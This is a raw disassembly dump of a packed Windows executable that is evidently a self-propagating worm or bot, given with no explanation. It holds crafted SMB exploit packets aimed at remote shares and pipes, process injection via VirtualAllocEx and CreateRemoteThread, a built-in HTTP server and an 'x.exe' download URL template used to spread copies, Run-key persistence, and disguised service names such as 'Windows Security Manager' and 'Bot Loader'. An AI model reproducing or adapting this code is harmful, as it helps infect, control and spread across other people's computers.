; DATA XREF: sub_314319BC+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31434634 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_314346E0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_314347C0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_314319BC+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31434824 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31434890 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31434934 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_314349B4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31434A48 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31434AB4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_314319BC+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31434B28 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31434BE6 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31434C20 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_314319BC+41B�o
; sub_314319BC+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31434C98: ; DATA XREF: sub_314319BC+44A�o
jmp short loc_31434CA0
; ---------------------------------------------------------------------------
jmp short loc_31434CA2
; ---------------------------------------------------------------------------
align 10h
loc_31434CA0: ; CODE XREF: UPX0:loc_31434C98�j
; DATA XREF: sub_314319BC+5C�o
pop esp
pop esp
loc_31434CA2: ; CODE XREF: UPX0:31434C9A�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31434CAC dd 1CEC8166h dword_31434CB0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31431F23+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31431F23+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31431F23+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31431F23+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31431F23+8�o
; sub_3143256D+13A�o
align 4
aUterm192 db 'uterm19-2',0 ; DATA XREF: sub_31431FAB:loc_31432090�o
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31431FAB+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31431FAB:loc_31431FF2�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31431FAB+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31431FAB+18�o
align 4
dword_31434D64 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31432239+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31432239+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_31432239+3D�o
aUterm20 db 'uterm20',0 ; DATA XREF: UPX0:3143250C�o
; sub_3143256D+148�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:314324F7�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_3143256D+141�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3143256D+133�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_3143256D+12C�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3143256D+11F�o
align 10h
aU20x db 'u20x',0 ; DATA XREF: sub_3143256D+CB�o
align 4
aU20 db 'u20',0 ; DATA XREF: sub_3143256D+C4�o
aU19 db 'u19',0 ; DATA XREF: sub_3143256D+BD�o
aU18 db 'u18',0 ; DATA XREF: sub_3143256D+B6�o
aU17 db 'u17',0 ; DATA XREF: sub_3143256D+AF�o
aU16 db 'u16',0 ; DATA XREF: sub_3143256D+A8�o
aU15 db 'u15',0 ; DATA XREF: sub_3143256D+A1�o
aU14 db 'u14',0 ; DATA XREF: sub_3143256D+9A�o
aU13i db 'u13i',0 ; DATA XREF: sub_3143256D+93�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_3143256D+8C�o
aU12 db 'u12',0 ; DATA XREF: sub_3143256D+85�o
aU11 db 'u11',0 ; DATA XREF: sub_3143256D+7E�o
aU10 db 'u10',0 ; DATA XREF: sub_3143256D+77�o
aU9 db 'u9',0 ; DATA XREF: sub_3143256D+70�o
align 10h
aU8 db 'u8',0 ; DATA XREF: sub_3143256D+69�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_3143256D+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_3143256D+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_3143256D+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_3143256D+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_3143256D+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_3143256D+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_3143256D+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_3143256D+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_3143256D+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_3143256D+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_314328D7+2D�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_3143237F+23�o
; sub_31432BAD+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_3143237F+1C�o
; sub_31432C62+87�o ...
align 10h
aGnihgcmsdqchen db 'gnihgcmsdqchenj',0 ; DATA XREF: sub_31431782+4F�o
; sub_31432D2E+57�o ...
dd 2 dup(0)
aSoftwareMicr_1 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31432D2E+32�o
aClient db 'Client',0 ; DATA XREF: sub_31432D2E+BC�o
; sub_31432D2E+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31432D2E+37�o
; sub_31432D2E+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31432BAD+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31432BAD+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31432BAD+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31432BAD+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31432BAD+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31432BAD+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31432BAD+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31432BAD+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31432BAD+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31432BAD+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31432BAD+F�o
align 4
a1: ; DATA XREF: sub_31432D2E+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31435028 dd 0 ; sub_3143237F+80�w
dword_3143502C dd 0 ; sub_3143185D+53�o ...
dword_31435030 dd 0 ; sub_31432239:loc_314322E7�r ...
dword_31435034 dd 68h ; UPX0:31432517�w ...
dword_31435038 dd 0 ; sub_3143256D+DC�w
dword_3143503C dd 0 ; sub_314328D7+20�r
dword_31435040 dd 31430000h ; UPX0:314324FC�w
dword_31435044 dd 0 ; sub_3143185D+4A�o ...
dword_31435048 dd 0 ; UPX0:31432974�w ...
dword_3143504C dd 0 ; sub_31432728+41�r ...
dword_31435050 dd 0 ; sub_31432D2E+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31436000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31436000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31437C81�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 4C746547h
dd 45747361h, 726F7272h, 72570100h, 46657469h, 656C69h
dd 6F6C4301h, 61486573h, 656C646Eh, 72430100h, 65746165h
dd 656C6946h, 6C010041h, 6C727473h, 416E65h, 74736C01h
dd 74616372h, 47010041h, 79537465h, 6D657473h, 65726944h
dd 726F7463h, 1004179h, 65746E49h, 636F6C72h, 4564656Bh
dd 61686378h, 65676Eh, 74654701h, 61636F4Ch, 6E49656Ch
dd 416F66h, 656C5301h, 1007065h, 7274736Ch, 6E797063h
dd 47010041h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 65470100h, 6F725074h, 64644163h, 73736572h, 6F4C0100h
dd 694C6461h, 72617262h, 1004179h, 74697257h, 6F725065h
dd 73736563h, 6F6D654Dh, 1007972h, 6E65704Fh, 636F7250h
dd 737365h, 74654701h, 75646F4Dh, 6148656Ch, 656C646Eh
dd 47010041h, 69547465h, 6F436B63h, 746E75h, 65724301h
dd 4D657461h, 78657475h, 43010041h, 74616572h, 72685465h
dd 646165h, 65724301h, 50657461h, 65636F72h, 417373h, 74655301h
dd 6E657645h, 4F010074h, 456E6570h, 746E6576h, 45010041h
dd 54746978h, 61657268h, 49010064h, 7265746Eh, 6B636F6Ch
dd 6E496465h, 6D657263h, 746E65h, 61655201h, 6C694664h
dd 47010065h, 69467465h, 6953656Ch, 100657Ah, 74697845h
dd 636F7250h, 737365h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 6F746101h, 73010069h, 68637274h
dd 0E9000072h, 14000000h, 1000001h, 646E6946h, 646E6957h
dd 41776Fh, 74654701h, 65726F46h, 756F7267h, 6957646Eh
dd 776F646Eh, 65470100h, 6E695774h, 54776F64h, 61657268h
dd 6F725064h, 73736563h, 1006449h, 72707377h, 66746E69h
dd 0F4000041h, 28000000h, 1000001h, 65746E49h, 74656E72h
dd 6E65704Fh, 416C7255h, 6E490100h, 6E726574h, 704F7465h
dd 416E65h, 746E4901h, 656E7265h, 6F6C4374h, 61486573h
dd 656C646Eh, 6E490100h, 6E726574h, 65477465h, 6E6F4374h
dd 7463656Eh, 74536465h, 657461h, 746E4901h, 656E7265h
dd 61655274h, 6C694664h, 65h, 40000001h, 0FF000001h, 2FF0073h
dd 0DFF00h, 0FF0001FFh, 6FFF0039h, 34FF00h, 0FF0017FFh
dd 9FF000Ch, 4FF00h, 0FF0013FFh, 16FF0010h, 3FF00h, 0
dd 455000h, 2014C00h, 0E07ED200h, 40h, 0
dd 0F00E000h, 6010B01h, 280000h, 120000h, 0
dd 24EF00h, 100000h, 400000h, 43000000h, 100031h, 20000h
dd 400h, 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 2F0400h, 8C00h, 14h dup(0)
dd 100000h, 18000h, 6 dup(0)
dd 65742E00h, 7478h, 263200h, 100000h, 280000h, 40000h
dd 3 dup(0)
dd 4002000h, 61642EE0h, 6174h, 105400h, 400000h, 120000h
dd 2C0000h, 3 dup(0)
dd 4000h, 5000C0h, 311000h, 54C900h, 57965900h, 6849FAFAh
dd 0B7000E29h, 844F4CCFh, 0A2623FE0h, 0DC24106Ah, 0DED1BA53h
dd 44810B66h, 5F0DC766h, 0B73BD68h, 0E4D6E6CDh, 0DE196664h
dd 164C2621h, 0FC5644DEh, 31E07589h, 51B36968h, 3EA2E2Eh
dd 0C8BF9C37h, 0E89C3A7h, 6CD8E087h, 770D7C13h, 0A8433716h
dd 18D3B345h, 9B6BDB07h, 0F88C0D0Bh, 49190640h, 73F27046h
dd 6A9821CDh, 4634332Eh, 17273C8h, 37E0DE64h, 3010CCDFh
dd 8C0F4608h, 0D0BD8027h, 740B89E5h, 0C5803126h, 43089D01h
dd 0D0EECD70h, 0BC3C0007h, 115690F0h, 0B66061EEh, 0AA425F0Ch
dd 0C1FF15Ch, 11784396h, 0C9EC0CB3h, 9705C87Ch, 0F8786E0Ah
dd 894BE6A1h, 25620546h, 0DA46568h, 0AEC28B6Dh, 92A2043Bh
dd 3CF01Ch, 27BE83Bh, 100BC86Ah, 4824A32Eh, 86024A19h
dd 0A0CF6043h, 2163390h, 0B9AEBB03h, 0A73D7D95h, 769F6801h
dd 664A48E6h, 3A21B736h, 1B5AB7CCh, 3DB9A4E0h, 6A7684E4h
dd 96F42A70h, 364719B4h, 5EC86007h, 7A97640Ah, 39F0D92Eh
dd 0A2280084h, 3C4B283Fh, 0CDCB59B2h, 98B9B26Ch, 23BDEBE2h
dd 0DC0167A7h, 0C77E500Fh, 0BE1F218Dh, 0AC68F60Eh, 0D328C00Dh
dd 0C676E6C9h, 0E57A08A1h, 0DB0C7A04h, 0C8611488h, 2DC54C20h
dd 6C84BF34h, 2EDB1CD6h, 0B698DE40h, 4192FC84h, 40BCDE44h
dd 0C27190D6h, 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh
dd 67E9ACF9h, 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h
dd 1CF25B07h, 96F41276h, 0A19DE9C3h, 4F0CEF1Bh, 7BC87C6Ah
dd 64B1E3C3h, 0C9BE4934h, 991DD27Bh, 90E154E4h, 0B42DE924h
dd 48B9B999h, 0EDCF7881h, 0C80A5848h, 0CF88286h, 6633F415h
dd 2665846h, 7808747Ah, 41BA9D5Fh, 5FF4C65Eh, 7D1C0F8Ah
dd 9C1369E0h, 0AC204D0Ch, 0C0A8357Fh, 5F68683h, 572448F8h
dd 565FC937h, 5A7457D8h, 74F80E14h, 0B8C8684Bh, 0CA8950BAh
dd 0E83D7496h, 4B4B3F6Ch, 0A44120C9h, 0FFC55FFh, 0F6B9ADE8h
dd 50E4B92Ch, 0E9628ACh, 0CCDA6AD9h, 0F81B02F0h, 0E48C0009h
dd 81DB40ACh, 42F47558h, 29C587EEh, 8B181F13h, 6701400Dh
dd 0BFEEFFB6h, 3C418B2Fh, 68C10357h, 488B9758h, 50788B34h
dd 0A0F44D89h, 8D759CB8h, 1BDBD84Bh, 0BEF09153h, 0B002F0ACh
dd 4751EB01h, 0ED74EC12h, 1AC55A0Ch, 0D7240Dh, 9300CA82h
dd 18090E6Dh, 0B22ECDEh, 0F84DAFDFh, 1C185051h, 412A6897h
dd 8958D8ABh, 60FE5DB4h, 0CAD2C68Bh, 1C346B03h, 0B7680630h
dd 59AB1976h, 0BE7DF055h, 135BAB62h, 0F03E45E6h, 0DC50EF51h
dd 34EC5F13h, 34A110B0h, 0FFFAD6BDh, 172783C4h, 5577D06Ah
dd 74C73BECh, 805F8C78h, 1BEB1605h, 684D1868h, 3959E010h
dd 0E5CC857h, 8D405FCh, 0F8041D74h, 0FC58EFA2h, 4251511Dh
dd 2F0DC32Bh, 69310F60h, 41B60D10h, 0BC258964h, 22B1AFDDh
dd 138575D6h, 590FECB2h, 5D33DB2Dh, 6AF9C267h, 803CC0B6h
dd 624EE90Ch, 50A85089h, 0C42C507Dh, 0AC297488h, 8020195Dh
dd 0B3F8B55Bh, 7C8B5743h, 57D21424h, 67FFF7Eh, 1A87178Bh
dd 8861C280h, 3B461E14h, 80E97CF7h, 0E030E036h, 4A003B24h
dd 86444954h, 2EDB78CEh, 57AC5A5Fh, 2166DB56h, 303A5DCh
dd 0F0DC732Fh, 25B81950h, 648D62h, 0E377ACAAh, 954D04F0h
dd 49F408C8h, 0DBA32668h, 0F00CFADAh, 3408C7FFh, 0DA65B27Bh
dd 2E2ACC34h, 0A0A7550h, 666B5CE8h, 1A20BC54h, 0B7ED5818h
dd 7C64F85h, 13B7FB8h, 0C408B14h, 2C01008Bh, 86F8E76h
dd 24448D51h, 1134215Fh, 9A7C2D3h, 245903DBh, 0BBD01507h
dd 7743A19Eh, 2FCC2007h, 3233E433h, 0F8C83FDBh, 8510E7C1h
dd 0A05B60Bh, 200CD86h, 0CF125D8Bh, 1C0BABECh, 7FC20099h
dd 7B55C653h, 139E2416h, 0C0934521h, 25AAECF0h, 6E5D868h
dd 5B4ECF20h, 17B5ADE7h, 675641F0h, 35953336h, 0A33D986Ch
dd 8CC6EC66h, 503044B7h, 0B370FE47h, 4D80C581h, 0EBDA14A5h
dd 54B3174Eh, 0A134007Ch, 37FBAE33h, 7900B9F0h, 0C13BC72Bh
dd 0C18B0272h, 0FC292BE1h, 0A1DDBDDDh, 0C7031828h, 1374AC23h
dd 1172233Dh, 4678516Ah, 40F8784Bh, 0EC13C4EBh, 0E1B462D9h
dd 0D8117750h, 0DC9A941Eh, 68159E4Dh, 68030B68h, 9B6B3A64h
dd 3A3C97C5h, 8F535453h, 52CC7D18h, 9824D483h, 0C423347Dh
dd 30DE04C2h, 4FB2F457h, 0B1B1087Dh, 0E868C3D0h, 168EE4Eh
dd 0B8BAAFDEh, 89FF6806h, 0ED04841Dh, 0D4244BA9h, 539100F2h
dd 9886937Bh, 3A01026Dh, 1CD680A6h, 0FD775A8Dh, 0E741A4Dh
dd 2F6946CFh, 0CA3E0CDh, 0ACEF4BC2h, 0A4FEA365h, 565153FCh
dd 635B3A5Bh, 68DC3A86h, 87DF2656h, 5EF9119Bh, 10C25C19h
dd 1B4D424Ch, 56C05E05h, 9DFD0C4Bh, 89E8D2F4h, 50DEC5Dh
dd 1FFF25FFh, 0BEEC1BFDh, 0A3C33A04h, 0E774433Ch, 84CC8A1Fh
dd 50DF74C9h, 937ABE3h, 5F42EA6Bh, 4C85A544h, 646530B7h
dd 0B97B480Ch, 5F7D35FBh, 1FD814F8h, 68B1114Ch, 0D9C22239h
dd 9111D5Bh, 53E2EB62h, 0CC455FCFh, 4384B982h, 0B6700190h
dd 0AE3AF759h, 0D6B03340h, 36023E11h, 0E687A60Fh, 0B8803AD6h
dd 3044E468h, 0A3AB1B63h, 7C74E040h, 4AB27633h, 34A37B69h
dd 767B781Ah, 0B73D6182h, 29E44552h, 43041F0Fh, 1BB37D9Ch
dd 682A1DA9h, 0A713256Dh, 13ED7ED1h, 1586EB0Dh, 35699969h
dd 0AC188438h, 397044C6h, 4B104D40h, 0D290E409h, 3372396Ch
dd 88454ADCh, 8C06EF9Ch, 238C9094h, 941C8E47h, 9C7C9884h
dd 0E472A074h, 0A46C91C8h, 0AC5CA864h, 1C8E4754h, 0B450B039h
dd 0BC48B84Ch, 91C8E444h, 0C440C023h, 8E34C83Ch, 0CC72391Ch
dd 0D42CD030h, 0C724D828h, 0DC472391h, 0E41CE020h, 76CD9018h
dd 9C10C780h, 0A36CE145h, 7ADB72F1h, 2FCBEECh, 730A8384h
dd 0B806ED12h, 4F8442B4h, 59B8885h, 9B0CFF59h, 0EBD9C870h
dd 0B00E1AE8h, 0E0F91A6Ah, 95391A17h, 8683974h, 32ACB94Eh
dd 45936C72h, 0F8064E00h, 21760C4Dh, 0A8F07261h, 49BF140Ah
dd 79B7676Eh, 0EF15237Fh, 0F1185D0Ah, 33C822E0h, 559C5029h
dd 0D747E90Fh, 18B4146Dh, 0AA138806h, 1412E3EBh, 17A7049Eh
dd 0DBA3BD23h, 63123818h, 7FA48071h, 8FD5BDh, 458A4FBBh
dd 0FF77530Bh, 83DBDB32h, 3A518701h, 5D3831D9h, 0E93125DBh
dd 5D88E291h, 0B8099D0Bh, 80CF1559h, 4CB72CDFh, 0F1F7D233h
dd 0FE9BD103h, 0CB65EBC3h, 0FFFB80F8h, 60C6BD72h, 1C0F5674h
dd 7A303876h, 41586667h, 4F870ADBh, 40A7F05h, 3B6B3618h
dd 9A0B0918h, 17692573h, 0F758BECh, 37272804h, 0AC01D0C8h
dd 8147822Bh, 6CE27695h, 4C9FA16Ah, 7A595D5Eh, 2CD74CAEh
dd 0F0A26472h, 7832DB7Ch, 0FD720A2Eh, 35F8FF04h, 0FEF42Fh
dd 0F7887F3Ch, 0B18BB06Ah, 4D8B6C3h, 0A9DCFD3Bh, 0EC04A23Eh
dd 579F6764h, 9B572F9Dh, 4B3DB21Ch, 1359F8E0h, 4A36FF8Ah
dd 0B2C54ADCh, 68FCEE75h, 0C8EC3C27h, 0BDD3A21Ah, 70849ED3h
dd 1C180961h, 4C5AA537h, 52AD630h, 508FCC4Fh, 18B6BD78h
dd 0FC68BAE3h, 67B7C156h, 0B3C443Eh, 0A468B003h, 0DCB71E4Eh
dd 11104580h, 6842E231h, 12F7D70h, 0B80C613h, 0C0B343DFh
dd 5579BB02h, 8E579756h, 663C344h, 4D1DE6BCh, 30E26CA4h
dd 0FD1F0C43h, 53146CF4h, 483776CDh, 20BF66Bh, 4838506Ah
dd 76D9A65Dh, 0D005C7DFh, 1974F896h, 9D01480Bh, 0BDDCCE60h
dd 141A055Eh
dd 0E103D851h, 1806DE27h, 0C9FB81D3h, 0D6530D74h, 0B6844203h
dd 1D1053C7h, 0DB04C3Bh, 1824C37Dh, 0ED85ED3Ch, 10B1117Eh
dd 0EED82C28h, 144DEDB0h, 0A40598EFh, 200DF2EBh, 75324B74h
dd 6DDEB65h, 0EB45C0B0h, 27D53F68h, 60B11BA2h, 0B5150C64h
dd 43A5106Fh, 14083BE8h, 6CD7513Bh, 18D4C859h, 18430856h
dd 31883EF6h, 3D566C2Eh, 0A52ADC74h, 4DE702DBh, 2050DF61h
dd 4E05B110h, 3081896h, 6B0F5EB6h, 557E2CD1h, 0FAEDC68Bh
dd 6764C82Eh, 532C56ADh, 67005556h, 270C422Dh, 0C520A31h
dd 2C81C931h, 0C45D0C04h, 0BB679061h, 0E0530128h, 0F40B89FBh
dd 8E3D4E2Dh, 1E3C4094h, 1F10365Ch, 794E7A1Ch, 0F8E510F7h
dd 0EB778B64h, 687AA239h, 17D86635h, 0B13B3Bh, 2005C710h
dd 0A24F7789h, 7DF21E99h, 1E748D47h, 0BD02609Bh, 0AE48FCA2h
dd 0FE8194DCh, 0B5FF1C2Ah, 0FFF51EFh, 0E6CCCD1Fh, 60085282h
dd 0D5CCE50h, 76EC4687h, 3CB787BDh, 89D0D036h, 0B457E273h
dd 23914FECh, 6D846C7h, 0B4D8C0D4h, 0C8E47239h, 0A0E0ACDCh
dd 7CE888E4h, 1C8E4730h, 50F060ECh, 45F340F4h, 86B764D3h
dd 0BE70BF0Bh, 8B858E85h, 188B8A05h, 0A0406C49h, 8357C491h
dd 0F4D50E17h, 1D101B05h, 8340F10Bh, 326A8452h, 0A775BFAFh
dd 4D84628Ah, 74767830h, 5D74B409h, 653FA8CCh, 0A5636A88h
dd 0FE0B84C8h, 28A19C09h, 8303E083h, 866305C0h, 5BD3CAA3h
dd 51CFC42Ah, 10B9186Eh, 661C3D1Eh, 0D6CE9DEEh, 3F140E26h
dd 3D9A0497h, 0D56150E8h, 1425A00Bh, 0CD4B4D21h, 0D2415662h
dd 7D09E592h, 19419836h, 0C401F454h, 2E987A04h, 0AB8BE407h
dd 0B408B9F6h, 481FC523h, 436839C7h, 2565140Ch, 84102550h
dd 0E04DBFDDh, 0BF501D6Ah, 3C4C4F18h, 0C1D0514Fh, 743F81EAh
